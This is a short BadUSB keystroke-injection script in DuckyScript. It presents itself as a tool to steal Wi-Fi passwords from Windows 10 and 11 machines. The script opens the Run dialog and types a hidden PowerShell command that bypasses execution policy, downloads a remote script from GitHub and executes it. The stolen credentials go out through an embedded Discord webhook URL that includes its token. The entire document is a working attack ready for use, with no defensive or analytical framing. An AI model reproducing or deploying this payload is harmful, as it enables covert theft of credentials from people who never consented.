REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : Aleff                                            |
REM # Description: A script used to stole target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $discord='https://discord.com/api/webhooks/1258457412218912879/UrCDQe4bLiJ3bjqAk1qNEZMBH7y3yZJFKY85fm_myreCIWngRK8n4G0HypyIQFYDfWre';irm https://raw.githubusercontent.com/wzqvip/Flipper-BadUSB/main/1-resources/Windows-Passwords-ENG.ps1 | iex
